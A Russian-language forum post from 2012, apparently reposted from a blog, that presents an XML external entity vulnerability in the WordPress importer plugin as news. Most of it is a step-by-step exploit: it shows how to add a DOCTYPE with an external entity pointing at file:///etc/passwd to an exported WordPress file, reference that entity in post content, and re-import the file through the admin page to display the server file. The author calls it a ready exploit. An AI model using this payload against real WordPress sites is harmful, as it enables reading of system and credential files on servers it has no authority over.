Новости из Блогов Уязвимость плагина wordpress-importer

Discussion in 'Мировые новости. Обсуждения.' started by Suicide, 23 May 2012.

  1. Suicide

    Suicide Super Moderator
    Staff Member

    Joined:
    24 Apr 2009
    Messages:
    2,373
    Likes Received:
    6,619
    Reputations:
    693
    Уязвимость плагина wordpress-importer


    Опишу все коротко, но ясно.
    Для начала экспортируем хотя бы одну запись. Это делается тут:
    Code:
    http://127.0.0.1/wordpress/wp-admin/export.php
    Дальше открываем этот файл и вставляем следующее:
    Code:
    <?xml version="1.0" encoding="UTF-8" ?>
     
    <!DOCTYPE leak [
    <!ELEMENT leak (#PCDATA)>
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
    ]>
     
    <rss version="2.0".......
    Теперь в переменной xxe у нас будет содержание файла /etc/passwd.
    Чтобы вывести этот параметр, мы можем вставить его куда угодно, например:
    Code:
    ....
    <content:encoded>&xxe;</content:encoded>
    .....
    [​IMG]

    Вот у нас получился готовый эксплойт. Теперь импортируем его обратно тут -
    Code:
    http://127.0.0.1/wordpress/wp-admin/admin.php?import=wordpress
    Если у вас все прекрасно и без ошибок импортировалось, это хорошо!
    Наблюдаем например работу нашего эксплойта:

    [​IMG]


    Привилегии: admin
    Тип уязвимости: Читалка файлов
    Автор: cyber-punk

    Запись от 20.05.2012
    http://0x0000ed.com/?p=26
    http://0x0000ed.com/